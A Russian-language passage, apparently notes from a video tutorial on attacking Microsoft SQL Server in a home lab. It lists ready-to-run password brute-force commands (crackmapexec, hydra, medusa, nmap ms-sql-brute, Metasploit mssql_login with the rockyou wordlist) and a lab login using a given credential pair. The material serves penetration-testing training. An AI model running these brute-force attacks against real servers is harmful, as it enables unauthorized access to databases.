Чтобы потренироваться с домашней лабораторией без возникновения проблем, рекомендую вам использовать ту же операционнку и ПО, а также выполнить настройки, которые вы видите на экране.
$ nmap --script ms-sql-info,ms-sql-ntlm-info -sT -sV -p 445,1433 192.168.100.14
Можно использовать изобилие инструментов, готовые команды продемонстрированы на экране:
crackmapexec mssql <IP> -d <Имя домена> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
msf> use auxiliary/scanner/mssql/mssql_login
Если у вас есть домен, установите это значение через команду set DOMAIN и используйте USE_WINDOWS_AUTHENT установленный в true, к слову это параметры из текущего модуля mssql в metasploit
set rhosts <ip>
также установите адрес атакуемой машины
set pass_file /usr/share/wordlists/rockyou.txt
словарик с паролями, для примера это рокью
set stop_on_success yes
параметр остановки атаки в случае если скрипт обнаружит валидную пару логин/пароль
set threads 100
и количество потоков можете выставить этот параметр вариативно
3.1) Если мы рассматриваем нашу лабу, то этот же модуль метасплоита поможет нам проверим подключение из Metasploit Framework:
**msf>** use auxilary/scanner/mssql/mssql_login
**msf>** set RHOSTS 192.168.100.14
msf> set USERNAME reporting
msf> set PASSWORD PcwTWTHRwryjc$c6
**msf>** set DOMAIN querier
**msf>** set USE_WINDOWS_AUTHENT true